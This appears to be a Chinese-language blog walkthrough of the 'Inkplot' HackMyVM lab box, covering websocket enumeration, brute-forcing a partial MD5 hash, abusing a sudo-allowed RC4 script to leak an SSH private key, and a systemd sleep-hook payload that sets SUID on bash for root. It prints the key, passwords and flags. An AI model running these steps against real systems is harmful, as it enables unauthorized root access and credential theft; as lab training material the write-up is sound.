hmv[-_-]Inkplot

Inkplot

image-20240422132002993

image-20240422132155403

信息搜集

端口扫描

rustscan -a 192.168.0.147 -- -A

Open 192.168.0.147:22
Open 192.168.0.147:3000

PORT     STATE SERVICE   REASON  VERSION
22/tcp   open  ssh       syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey: 
|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOHL4gbzUOgWlMW/HgWpBe3FlvvdyW1IsS+o1NK/YbUOoM3iokvdbkFxXdYjyvzkNpvpCXfldEQwS+BIfEmdtwU=
|   256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC0o8/EYPi0jQMqY1zqXqlKfugpCtjg0i5m3bzbyfqxt
3000/tcp open  websocket syn-ack Ogar agar.io server
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

漏洞发现

踩点

┌──(kali💀kali)-[~/temp/Inkplot]
└─$ curl http://192.168.0.147:3000                                                                                           
Upgrade Required

查看一下这个端口:https://book.hacktricks.xyz/pentesting-web/h2c-smuggling#websocket-smuggling

image-20240422150418040

比较符合我们找到的东西,我们继续搜集一下信息:

https://book.hacktricks.xyz/pentesting-web/websocket-attacks

image-20240422132834482

爆破hash

尝试使用编译好的连接一下:

┌──(kali💀kali)-[~/temp/Inkplot]
└─$ ./websocat.x86_64-unknown-linux-musl ws://192.168.0.147:3000
Welcome to our InkPlot secret IRC server
Bob: Alice, ready to knock our naive Leila off her digital pedestal?
Alice: Bob, I've been dreaming about this for weeks. Leila has no idea what's about to hit her.
Bob: Exactly. We're gonna tear her defense system apart. She won't see it coming.
Alice: Poor Leila, always so confident. Let's do this.
Bob: Alice, I'll need that MD5 hash to finish the job. Got it?
Alice: Yeah, I've got it. Time to shake Leila's world.
Bob: Perfect. Release it.
Alice: Here it goes: d51540...
*Alice has disconnected*
Bob: What?! Damn it, Alice?! Not now!
Leila: clear

意思大概是MD5 hash前几位是d51540,尝试写脚本进行爆破:

#!/bin/bash
flag="d51540"

while read -r word; do
    hash=$(echo "$word" | md5sum | cut -d " " -f 1)
    if [[ $hash == $flag* ]]; then
        echo "[+]I got it! PASS: $word, HASH: $hash"
    fi
done < $1
┌──(kali💀kali)-[~/temp/Inkplot]
└─$ ./brute.sh /usr/share/wordlists/rockyou.txt
[+]I got it! PASS: palmira, HASH: d515407c6ec25b2a61656a234ddf22bd
[+]I got it! PASS: intelinside, HASH: d51540c4ecaa62b0509f453fee4cd66b

尝试使用其进行登录!

leila
intelinside

image-20240422135901737

提权

信息搜集

╭─leila@inkplot ~ 
╰─$ ls -la
total 48
drwx---r-x  5 leila leila 4096 Apr 22 07:59 .
drwxr-xr-x  4 root  root  4096 Jul 28  2023 ..
-rw-r--r--  1 leila leila  220 Jul 28  2023 .bash_logout
-rw-r--r--  1 leila leila 3526 Jul 28  2023 .bashrc
-rw-------  1 leila leila   20 Aug  1  2023 .lesshst
drwxr-xr-x  3 leila leila 4096 Jul 28  2023 .local
drwxr-xr-x 12 leila leila 4096 Jul 28  2023 .oh-my-zsh
-rw-r--r--  1 leila leila  807 Jul 28  2023 .profile
drwx------  2 leila leila 4096 Jul 28  2023 .ssh
-rw-r--r--  1 leila leila  169 Apr 22 07:58 .wget-hsts
-rw-------  1 leila leila   22 Apr 22 07:59 .zsh_history
-rw-r--r--  1 leila leila 3890 Jul 28  2023 .zshrc
╭─leila@inkplot ~ 
╰─$ cat /etc/passwd
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
crom:x:1001:1001:,,,:/home/crom:/bin/zsh
pauline:x:1000:1000:,,,:/home/pauline:/bin/zsh
websocat:x:103:111::/nonexistent:/usr/sbin/nologin
leila:x:1003:1003:,,,:/home/leila:/bin/zsh
╭─leila@inkplot ~ 
╰─$ cat /etc/shadow 
cat: /etc/shadow: Permission denied
╭─leila@inkplot ~ 
╰─$ sudo -l                                                                                                                                         1 ↵
Matching Defaults entries for leila on inkplot:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User leila may run the following commands on inkplot:
    (pauline : pauline) NOPASSWD: /usr/bin/python3 /home/pauline/cipher.py*

cat: /home/pauline/cipher.py/: Not a directory
╭─leila@inkplot ~ 
╰─$ cat /home/pauline/cipher.py                                                                                                                     1 ↵
import os
import json
import argparse
from Crypto.Cipher import ARC4
import base64

with open('/home/pauline/keys.json', 'r') as f:
    keys = json.load(f)

crypt_key = keys['crypt_key'].encode()

def encrypt_file(filepath, key):
    with open(filepath, 'rb') as f:
        file_content = f.read()

    cipher = ARC4.new(key)
    encrypted_content = cipher.encrypt(file_content)

    encoded_content = base64.b64encode(encrypted_content)

    base_filename = os.path.basename(filepath)

    with open(base_filename + '.enc', 'wb') as f:
        f.write(encoded_content)

    return base_filename + '.enc'

def decrypt_file(filepath, key):
    with open(filepath, 'rb') as f:
        encrypted_content = f.read()

    decoded_content = base64.b64decode(encrypted_content)

    cipher = ARC4.new(key)
    decrypted_content = cipher.decrypt(decoded_content)

    return decrypted_content

parser = argparse.ArgumentParser(description='Encrypt or decrypt a file.')
parser.add_argument('filepath', help='The path to the file to encrypt or decrypt.')
parser.add_argument('-e', '--encrypt', action='store_true', help='Encrypt the file.')
parser.add_argument('-d', '--decrypt', action='store_true', help='Decrypt the file.')

args = parser.parse_args()

if args.encrypt:
    encrypted_filepath = encrypt_file(args.filepath, crypt_key)
    print("The encrypted and encoded content has been written to: ")
    print(encrypted_filepath)
elif args.decrypt:
    decrypt_key = input("Please enter the decryption key: ").encode()
    decrypted_content = decrypt_file(args.filepath, decrypt_key)
    print("The decrypted content is: ")
    print(decrypted_content)
else:
    print("Please provide an operation type. Use -e to encrypt or -d to decrypt.")

大概是对文本进行RC4加密以后再进行base64加密然后存储为enc文件,第一想法是加密再解密,可惜我们没有密钥,听师傅们说有个很神奇的特质:

image-20240422143010178

加密两次会复原,利用这个办法进行查询 ssh 私钥:

╭─leila@inkplot /tmp 
╰─$ sudo -l
Matching Defaults entries for leila on inkplot:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User leila may run the following commands on inkplot:
    (pauline : pauline) NOPASSWD: /usr/bin/python3 /home/pauline/cipher.py*
╭─leila@inkplot /tmp 
╰─$ sudo -u pauline /usr/bin/python3 /home/pauline/cipher.py
usage: cipher.py [-h] [-e] [-d] filepath
cipher.py: error: the following arguments are required: filepath
╭─leila@inkplot /tmp 
╰─$ sudo -u pauline /usr/bin/python3 /home/pauline/cipher.py -e /home/pauline/.ssh/id_rsa                                                           2 ↵
The encrypted and encoded content has been written to: 
id_rsa.enc
╭─leila@inkplot /tmp 
╰─$ cat id_rsa.enc | base64 -d > new_id_rsa.enc
╭─leila@inkplot /tmp 
╰─$ sudo -u pauline /usr/bin/python3 /home/pauline/cipher.py -e new_id_rsa.enc           
The encrypted and encoded content has been written to: 
new_id_rsa.enc.enc
╭─leila@inkplot /tmp 
╰─$ cat new_id_rsa.enc.enc                     
LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUJsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFZRUFyc3RKYXVLWThpRG9aMXN6aFdCT01PY2VyMW5zMTRPZ2FiVjR5R3VXYkxTWGova3pqQ1JFClVjTXU2MXNVWUxkM05GSzRKQWRTY1RzWkZhVmIybGw3Z3J3clNXWEVWUUwzdDRLNlRuWnpKczZiN2JrTXBKMkRqUHZBYTcKS2ltUm9SZzAybWFIS1BNWkNreEUwY0U2T29sZG1oblFZcjFPdTIyTXpFQlR6cGphbXdjUGIrd3dnTFBGdm1EeHd4NnpVdApKcWxCQW93SHVrK25zSHdDVnV3eTR1Y1VIdnh3c1F5NkQrbjVoQlc2Z1NTRXBOVWFreHJ0ZTI0a0RZN2M1TlRrY3NGakdHCk9ZbWhLL1VnVXRtUVZuMCsxUURjUkNEMk53NTZKN1lkNGQxS1ArMUJQVldSNzJhbXpGUjRWT24xVHIyWHc2d1FMRklUYW4KaFVqc2hzYXoxbnUwV1BVOXJvaXBTTnhXUVltQTdtWkUwQU9vWlBZbTFSVVMrQWRzaXNRNmQ5QkJRUmxGb29DekJXYXJCQQptNWpTdjJEWDhxMHRaTjVFeStTYkNDaUVUVnQ2ZXQ0TFdndEZwOVVQQWdhM2RUU1IwdkwyYlZxOVhOaGpOemhZK25DclBTCkhzV3doSFRnZCtiMm54WmRyTkJ1VG1zdU9tNCtKSkJLN2Fsb0QrMTVBQUFGaU4waWpDemRJb3dzQUFBQUIzTnphQzF5YzIKRUFBQUdCQUs3TFNXcmltUElnNkdkYk00VmdUakRuSHE5WjdOZURvR20xZU1ocmxteTBsNC81TTR3a1JGSERMdXRiRkdDMwpkelJTdUNRSFVuRTdHUldsVzlwWmU0SzhLMGxseEZVQzk3ZUN1azUyY3liT20rMjVES1NkZzR6N3dHdXlvcGthRVlOTnBtCmh5anpHUXBNUk5IQk9qcUpYWm9aMEdLOVRydHRqTXhBVTg2WTJwc0hEMi9zTUlDenhiNWc4Y01lczFMU2FwUVFLTUI3cFAKcDdCOEFsYnNNdUxuRkI3OGNMRU11Zy9wK1lRVnVvRWtoS1RWR3BNYTdYdHVKQTJPM09UVTVITEJZeGhqbUpvU3YxSUZMWgprRlo5UHRVQTNFUWc5amNPZWllMkhlSGRTai90UVQxVmtlOW1wc3hVZUZUcDlVNjlsOE9zRUN4U0UycDRWSTdJYkdzOVo3CnRGajFQYTZJcVVqY1ZrR0pnTzVtUk5BRHFHVDJKdFVWRXZnSGJJckVPbmZRUVVFWlJhS0Fzd1ZtcXdRSnVZMHI5ZzEvS3QKTFdUZVJNdmttd2dvaEUxYmVucmVDMW9MUmFmVkR3SUd0M1Uwa2RMeTltMWF2VnpZWXpjNFdQcHdxejBoN0ZzSVIwNEhmbQo5cDhXWGF6UWJrNXJManB1UGlTUVN1MnBhQS90ZVFBQUFBTUJBQUVBQUFHQVN4MXlOZndkMVFPZVMvaE42alhLTkVyR0RYCjM4QVZ0LzNwMk5RN2UwWTQreUNEMkQwT2d1OGVJS2Nqcm9SVzNpVExwMWhvb2MvQ3IwNnkvdUNxWGtwWGgrczZLSG5pN1IKekd0aDYrRU1PRE9XbjdDanhjUW82YmV3WjdmVEZ5ODBNblIybkRFSzV6WnRFQ3pBOFpHbG00djBYem50TVNtQW9LZFNYNQp2ZkZERkZjUzQ3cWcxMVlxRnRlclhYbitmd3VNb0lkWE0reU9wOU9pTDRrR2tkcnhPMXVtRXFmbk5sSy95VTdSVzNXZE1iCks0aW16R3ZJZllBRi8wdVRFc1dIbFdqL1hoOVpJSXdzMTk2S2VqNDVOd0M2TGo2UmhBRDNSbkpCNmVJRWVrenFIWEQ1anYKMjAwWE9KOTZ0dmUvbHdLbEUyZWdWR2xEZlhGRHkvUVU1WXpCR204VWd3NWFvWS93V0R1RG1OYjRtVDR4NUdHQ1ZocVRLWQpnOUppQlpGUHJkSFhGclp4bUpScEpLa1Azd2xMaVNYc0JQR2FMWjNxRFlVay9PeVRzNUhNREpoNTAzMFJ6Qlp5WG9kTXJ0Cjc5UXNqUEtxc1ZSL2d6YWd6Q2w3bWFTdFUzMDdrTGVFQnlDZDRmMlI0OWIwVXA3RFF2azdsdS8wMGJIdmFBVUcrL0FBQUEKd1FDcXFobDRqZ0MrMGJ2K2dIY0Z0VHZTcjFJVGdHYzVwc0ZId1diTnR3UUFHanhieUs0R3FlVTM1ckY2b2hOSXQ3dXNBQgpBQ2tiMmhSWTJVK1BQRTNNMkdzTXBQYnJXeWYwSlRnd0M4M0h3NWhFN2liUDRRWUsyeUFuNDA5elVudzZLQU4wdHVTVGJ5ClF0cmFWdXEwVEplWVUzbm9WSlVmRm1zMHgxUUFIQmN4TTlaOWsrMSt1alhsY1ppazlDM3FoRUFVZFR4aWtMeGpUT2FFaFcKVzZ5NDFrVjc4RzU0NmNnVWNqUk9CdTIxellzWTBHOHRQam9idFN6dVcrSGtva3ltb0FBQURCQVBKVUsrQ291VnlkRW1vMgpuOVJOWWI5eFg0SjBQUWdreTYwRVF4NXhxZUFMV2hIcUpYZXRtemd5QW0ycmx1R0ErNHUwZWN5eVZBN1hLMVN5TmRFTkhrClRiM05OQ3padmpmSEhyZkRtM3c3OTlQVlAzZEFocEkzSmIxa0ZkM0h5TURhRklGM3AxS3gvR2I4VXlPcWxpTGg5d09XTWEKcnV2UzRGdk9sZlc3WTl1WWtpTThaSHR4VWNZRWVqN3FUYkpmNFBNdERxRDhQODZqTE8xeVV5NTdKVTEwbnIyVTNoYllGRgpHeGdwMmNVR2cra0tsWHE5SktybGJ6YURuWkpFdzZvd0FBQU1FQXVLZS9MbmhXVGJJZ3cyOW1HUm9iZmxTaVBaUTltUTcrCmlFV1FXdzdGT1dwOGlHN09RM2J1Rk1DdnBzYWZqZTgrUEw0YlYwdUttSTZhbEsySW5xR2xON2p0K0ZZTENEdWdzbVV3aUEKQTZLcmxzRlh0UHYvQk9vNkxLNVllNk9UWUlRbklSRjVna3BVSjFGdVBTUTRkUHh3bEk3NDBPSEFpQjdCSE5nSlFoZCtFbApzWXdNQnJodXBORE5PakdJc2IydDV5Ly9PRUd3NGdpZjRGYmhEOUdxT2NnRG1Zb1hTUHhxTFVCOGRpdXBQVUdVSFVCT1NwCmFEZkFEOHloaVVtYlV6QUFBQURuQmhkV3hwYm1WQVpHVmlhV0Z1QVFJREJBPT0KLS0tLS1FTkQgT1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==%                       
╭─leila@inkplot /tmp 
╰─$ cat new_id_rsa.enc.enc | base64 -d
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEArstJauKY8iDoZ1szhWBOMOcer1ns14OgabV4yGuWbLSXj/kzjCRE
UcMu61sUYLd3NFK4JAdScTsZFaVb2ll7grwrSWXEVQL3t4K6TnZzJs6b7bkMpJ2DjPvAa7
KimRoRg02maHKPMZCkxE0cE6OoldmhnQYr1Ou22MzEBTzpjamwcPb+wwgLPFvmDxwx6zUt
JqlBAowHuk+nsHwCVuwy4ucUHvxwsQy6D+n5hBW6gSSEpNUakxrte24kDY7c5NTkcsFjGG
OYmhK/UgUtmQVn0+1QDcRCD2Nw56J7Yd4d1KP+1BPVWR72amzFR4VOn1Tr2Xw6wQLFITan
hUjshsaz1nu0WPU9roipSNxWQYmA7mZE0AOoZPYm1RUS+AdsisQ6d9BBQRlFooCzBWarBA
m5jSv2DX8q0tZN5Ey+SbCCiETVt6et4LWgtFp9UPAga3dTSR0vL2bVq9XNhjNzhY+nCrPS
HsWwhHTgd+b2nxZdrNBuTmsuOm4+JJBK7aloD+15AAAFiN0ijCzdIowsAAAAB3NzaC1yc2
EAAAGBAK7LSWrimPIg6GdbM4VgTjDnHq9Z7NeDoGm1eMhrlmy0l4/5M4wkRFHDLutbFGC3
dzRSuCQHUnE7GRWlW9pZe4K8K0llxFUC97eCuk52cybOm+25DKSdg4z7wGuyopkaEYNNpm
hyjzGQpMRNHBOjqJXZoZ0GK9TrttjMxAU86Y2psHD2/sMICzxb5g8cMes1LSapQQKMB7pP
p7B8AlbsMuLnFB78cLEMug/p+YQVuoEkhKTVGpMa7XtuJA2O3OTU5HLBYxhjmJoSv1IFLZ
kFZ9PtUA3EQg9jcOeie2HeHdSj/tQT1Vke9mpsxUeFTp9U69l8OsECxSE2p4VI7IbGs9Z7
tFj1Pa6IqUjcVkGJgO5mRNADqGT2JtUVEvgHbIrEOnfQQUEZRaKAswVmqwQJuY0r9g1/Kt
LWTeRMvkmwgohE1benreC1oLRafVDwIGt3U0kdLy9m1avVzYYzc4WPpwqz0h7FsIR04Hfm
9p8WXazQbk5rLjpuPiSQSu2paA/teQAAAAMBAAEAAAGASx1yNfwd1QOeS/hN6jXKNErGDX
38AVt/3p2NQ7e0Y4+yCD2D0Ogu8eIKcjroRW3iTLp1hooc/Cr06y/uCqXkpXh+s6KHni7R
zGth6+EMODOWn7CjxcQo6bewZ7fTFy80MnR2nDEK5zZtECzA8ZGlm4v0XzntMSmAoKdSX5
vfFDFFcS47qg11YqFterXXn+fwuMoIdXM+yOp9OiL4kGkdrxO1umEqfnNlK/yU7RW3WdMb
K4imzGvIfYAF/0uTEsWHlWj/Xh9ZIIws196Kej45NwC6Lj6RhAD3RnJB6eIEekzqHXD5jv
200XOJ96tve/lwKlE2egVGlDfXFDy/QU5YzBGm8Ugw5aoY/wWDuDmNb4mT4x5GGCVhqTKY
g9JiBZFPrdHXFrZxmJRpJKkP3wlLiSXsBPGaLZ3qDYUk/OyTs5HMDJh5030RzBZyXodMrt
79QsjPKqsVR/gzagzCl7maStU307kLeEByCd4f2R49b0Up7DQvk7lu/00bHvaAUG+/AAAA
wQCqqhl4jgC+0bv+gHcFtTvSr1ITgGc5psFHwWbNtwQAGjxbyK4GqeU35rF6ohNIt7usAB
ACkb2hRY2U+PPE3M2GsMpPbrWyf0JTgwC83Hw5hE7ibP4QYK2yAn409zUnw6KAN0tuSTby
QtraVuq0TJeYU3noVJUfFms0x1QAHBcxM9Z9k+1+ujXlcZik9C3qhEAUdTxikLxjTOaEhW
W6y41kV78G546cgUcjROBu21zYsY0G8tPjobtSzuW+HkokymoAAADBAPJUK+CouVydEmo2
n9RNYb9xX4J0PQgky60EQx5xqeALWhHqJXetmzgyAm2rluGA+4u0ecyyVA7XK1SyNdENHk
Tb3NNCzZvjfHHrfDm3w799PVP3dAhpI3Jb1kFd3HyMDaFIF3p1Kx/Gb8UyOqliLh9wOWMa
ruvS4FvOlfW7Y9uYkiM8ZHtxUcYEej7qTbJf4PMtDqD8P86jLO1yUy57JU10nr2U3hbYFF
Gxgp2cUGg+kKlXq9JKrlbzaDnZJEw6owAAAMEAuKe/LnhWTbIgw29mGRobflSiPZQ9mQ7+
iEWQWw7FOWp8iG7OQ3buFMCvpsafje8+PL4bV0uKmI6alK2InqGlN7jt+FYLCDugsmUwiA
A6KrlsFXtPv/BOo6LK5Ye6OTYIQnIRF5gkpUJ1FuPSQ4dPxwlI740OHAiB7BHNgJQhd+El
sYwMBrhupNDNOjGIsb2t5y//OEGw4gif4FbhD9GqOcgDmYoXSPxqLUB8diupPUGUHUBOSp
aDfAD8yhiUmbUzAAAADnBhdWxpbmVAZGViaWFuAQIDBA==
-----END OPENSSH PRIVATE KEY-----

然后利用这个进行登录:

┌──(kali💀kali)-[~/temp/Inkplot]
└─$ vim inkplot   

┌──(kali💀kali)-[~/temp/Inkplot]
└─$ chmod 600 inkplot                          

┌──(kali💀kali)-[~/temp/Inkplot]
└─$ ssh pauline@192.168.0.147 -i inkplot  
Auto-standby now activated after 2 min of inactivity
Linux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
[oh-my-zsh] Would you like to update? [Y/n] Y

提权到了一个新用户!

image-20240422144109980

提权至root

╭─pauline@inkplot ~ 
╰─$ ls -la
total 60
drwx---r-x  5 pauline pauline 4096 Apr 22 08:41 .
drwxr-xr-x  4 root    root    4096 Jul 28  2023 ..
-rw-r--r--  1 pauline pauline  220 Jul 22  2023 .bash_logout
-rw-r--r--  1 pauline pauline 3526 Jul 22  2023 .bashrc
-rw-r--r--  1 pauline pauline 1738 Aug  1  2023 cipher.py
-rw-r-----  1 pauline pauline   44 Jul 25  2023 keys.json
-rw-------  1 pauline pauline   20 Aug  1  2023 .lesshst
drwxr-xr-x  3 pauline pauline 4096 Jul 22  2023 .local
drwxr-xr-x 12 pauline pauline 4096 Apr 22 08:40 .oh-my-zsh
-rw-r--r--  1 pauline pauline  807 Jul 22  2023 .profile
drwx------  2 pauline pauline 4096 Jul 28  2023 .ssh
-rw-r--r--  1 pauline pauline    0 Jul 25  2023 .sudo_as_admin_successful
-rwx------  1 pauline pauline   33 Jul 24  2023 user.txt
-rw-r--r--  1 pauline pauline  169 Apr 22 08:40 .wget-hsts
-rw-------  1 pauline pauline   66 Apr 22 08:41 .zsh_history
-rw-r--r--  1 pauline pauline 3890 Jul 22  2023 .zshrc
╭─pauline@inkplot ~ 
╰─$ cat user.txt 
a2c145eb8279c2f920de6871bef794fa
╭─pauline@inkplot ~ 
╰─$ sudo -l
[sudo] password for pauline: 
Sorry, try again.
[sudo] password for pauline: 
sudo: 1 incorrect password attempt
╭─pauline@inkplot ~ 
╰─$ cat .zsh_history                                                                                                                              130 ↵
: 1713768084:0;sudo -l
: 1713768093:0;clear
: 1713768094:0;ls -la
: 1713768097:0;cat user.txt
: 1713768100:0;sudo -l
: 1713768121:0;cat .zsh_history
╭─pauline@inkplot ~ 
╰─$ cat keys.json   
{
    "crypt_key": "aLLtBh0BVCFSvfZ203sM"
}
╭─pauline@inkplot ~ 
╰─$ whoami;id     
pauline
uid=1000(pauline) gid=1000(pauline) groups=1000(pauline),100(users),1002(admin)
╭─pauline@inkplot ~ 
╰─$ find / -writable -type f 2>/dev/null
.......

发现我们居然是管理员组的,查询一下我们可以操作的文件,但是当我上个厕所以后准备查的时候发现:

╭─pauline@inkplot ~ 
╰─$ 
Broadcast message from root@inkplot (Mon 2024-04-22 08:45:59 CEST):

The system will suspend now!

存在定时任务。。。

┌──(kali💀kali)-[~/temp/Inkplot]
└─$ nmap 192.168.0.147   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 02:43 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds

啊这。。。。重启靶机:

╭─pauline@inkplot ~ 
╰─$ find / -group admin 2>/dev/null
/usr/lib/systemd/system-sleep

/usr/lib/systemd/system-sleep 是一个在 Linux 系统中由 systemd 管理的特殊目录,用于存放在系统进入睡眠状态(如挂起到内存或磁盘)或唤醒时自动执行的脚本。

当系统准备进入睡眠状态时,systemd 会运行此目录下所有以 .needs.wants 结尾的脚本,并传递一个参数,指示系统即将进入哪种睡眠状态(例如 suspendhibernatehybrid-sleep)。同样,当系统从睡眠状态唤醒时,也会运行相应的脚本。

这些脚本通常用于执行一些在系统睡眠或唤醒时需要进行的特殊操作,例如:

  • 保存或恢复某些硬件状态。
  • 停止或重启某些服务。
  • 更新或清理缓存。
  • 执行一些自定义的操作。

写一个文件到这里面去:

╭─pauline@inkplot ~ 
╰─$ cd /usr/lib/systemd/system-sleep                                                                                                                1 ↵
╭─pauline@inkplot /usr/lib/systemd/system-sleep 
╰─$ echo '#!/bin/bash' > payload
╭─pauline@inkplot /usr/lib/systemd/system-sleep 
╰─$ echo 'chmod +s /bin/bash' >> payload
╭─pauline@inkplot /usr/lib/systemd/system-sleep 
╰─$ cat payload                      
#!/bin/bash
chmod +s /bin/bash
╭─pauline@inkplot /usr/lib/systemd/system-sleep 
╰─$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1265648 Apr 23  2023 /bin/bash

然后不动,等待系统锁死:

image-20240422145654444

重启靶机:

┌──(kali💀kali)-[~/temp/Inkplot]
└─$ ssh pauline@192.168.0.147 -i inkplot 
Auto-standby now activated after 2 min of inactivity
Linux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Apr 22 08:51:04 2024 from 192.168.0.143
╭─pauline@inkplot ~ 
╰─$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1265648 Apr 23  2023 /bin/bash

没成功?尝试添加一个执行权限,再来一次:

╭─pauline@inkplot ~ 
╰─$ cd /usr/lib/systemd/system-sleep
╭─pauline@inkplot /usr/lib/systemd/system-sleep 
╰─$ ls             
payload
╭─pauline@inkplot /usr/lib/systemd/system-sleep 
╰─$ cat payload                     
#!/bin/bash
chmod +s /bin/bash
╭─pauline@inkplot /usr/lib/systemd/system-sleep 
╰─$ chmod +x payload
╭─pauline@inkplot /usr/lib/systemd/system-sleep 
╰─$ ls -la         
total 20
drwxrwx---  2 root    admin    4096 Apr 22 08:52 .
drwxr-xr-x 14 root    root    12288 Jul 28  2023 ..
-rwxr-xr-x  1 pauline pauline    31 Apr 22 08:52 payload

拿下root!

┌──(kali💀kali)-[~/temp/Inkplot]
└─$ ssh pauline@192.168.0.147 -i inkplot 
Auto-standby now activated after 2 min of inactivity
Linux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Apr 22 08:57:55 2024 from 192.168.0.143
╭─pauline@inkplot ~ 
╰─$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1265648 Apr 23  2023 /bin/bash
╭─pauline@inkplot ~ 
╰─$ bash -p
bash-5.2# cd /root
bash-5.2# ls -la
total 52
drwx------  6 root root 4096 Aug  3  2023 .
drwxr-xr-x 18 root root 4096 Jul 27  2023 ..
lrwxrwxrwx  1 root root    9 Jun 15  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 Jul 22  2023 .bashrc
-rw-------  1 root root   20 Aug  1  2023 .lesshst
drwxr-xr-x  3 root root 4096 Aug  1  2023 .local
drwxr-xr-x  4 root root 4096 Jul 26  2023 .npm
drwxr-xr-x 12 root root 4096 Jul 22  2023 .oh-my-zsh
-rw-r--r--  1 root root  161 Jul 22  2023 .profile
-rwx------  1 root root   33 Aug  1  2023 root.txt
-rw-r--r--  1 root root   66 Jul 22  2023 .selected_editor
drwx------  2 root root 4096 Jul 25  2023 .ssh
-rw-r--r--  1 root root  165 Jul 26  2023 .wget-hsts
lrwxrwxrwx  1 root root    9 Jul 22  2023 .zsh_history -> /dev/null
-rw-r--r--  1 root root 3890 Jul 22  2023 .zshrc
bash-5.2# cat root.txt 
4d9089c262be4a03e3ebfdaff0a8f7c6
bash-5.2# cd .local/
bash-5.2# ls -la
total 16
drwxr-xr-x 3 root root 4096 Aug  1  2023 .
drwx------ 6 root root 4096 Aug  3  2023 ..
drwx------ 3 root root 4096 Jul 22  2023 share
-rwxr-xr-x 1 root root  218 Aug  1  2023 suspend.sh
bash-5.2# cat suspend.sh 
#!/bin/bash

while true ; do
  TIME=$(w -o |grep "pauline" | awk '{print $5}')
  if [[ $TIME != "-zsh" ]] ; then
    TIME=${TIME%%:*}
    if [[ $TIME -gt 1 ]] ; then
      systemctl suspend
    fi
  fi
  sleep 5
done
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
